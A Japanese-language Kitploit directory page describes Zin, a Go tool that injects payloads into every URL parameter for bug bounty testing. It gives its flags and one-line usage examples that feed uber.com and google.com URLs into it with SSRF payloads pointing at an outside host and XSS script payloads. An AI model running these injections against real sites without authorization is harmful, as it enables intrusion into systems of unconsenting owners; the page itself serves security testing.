Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Zin — バグバウンティ向けのペイロードインジェクター(Go言語製) | Kitploit
ツール/GitHubGitHub/ethicalhackingplayground/zin
ウェブアプリケーション悪用情報収集ペネトレーションテスト
GitHubethicalhackingplayground/zin

Zin

バグバウンティ向けのペイロードインジェクター(Go言語製)

リポジトリを見る
70266年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

代替テキスト

バージョン 1.0

😎 Zin 😎

バグバウンティ用のペイロードインジェクター(Go言語製)

Gyazoからの画像

機能

  • 複数のペイロードをすべてのパラメータに注入
  • 単一のペイロードをすべてのパラメータに注入
  • レスポンスを出力フォルダに保存
  • ステータスコードとレスポンス長を表示
  • レスポンス内のパターンをgrep可能
  • 非常に高速
  • セットアップが簡単

インストール

$ go get -u github.com/ethicalhackingplayground/Zin

新機能

  • ✅ レスポンス内のパターンマッチング
  • ✅ ステータスコードのマッチング

引数

root@kitploit:~
      _
     (_)
  _____ _ __
 |_  / | '_ \
  / /| | | | |
 /___|_|_| |_|

報奨金が訪れますように

  -c int
        同時実行数(デフォルト: 20)
  -g string
        レスポンス内のマッチをgrepする
  -p string
        使用するペイロード
  -pL string
        使用するペイロードのリスト
  -s int
        ステータスコードでフィルタリング(デフォルト: 200)

SSRFの例

$ subfinder uber.com | gau | grep "=http" | Zin -c 80 -p http://10.82.214.84:31386/foobar.js -g "SUP3R_S3cret_1337_K3y"

XSSの例

$ subfinder uber.com | gau | Zin -c 80 -p '"><script>alert(matchforthis)script>' -g "matchforthis"

複数ペイロードの注入

$ cat hosts | gau | grep "&" | Zin -c 80 -pL <payloadfile>

サブドメインスキャン

$ subfinder -dL domains --silent | gau | Zin -c 80 -p <payload>

パラメータのみテスト

$ echo "google.com" | gau | grep "&" | Zin -c 80 -p '"><script>alert(matchthis)</script<"' -g "matchthis"

複数ホスト

$ cat hosts | gau | Zin -c 80 -p <payload>

もし報奨金を受け取ったら、コーヒーを買ってサポートしてください


コーヒーを買ってください
ツールをダウンロード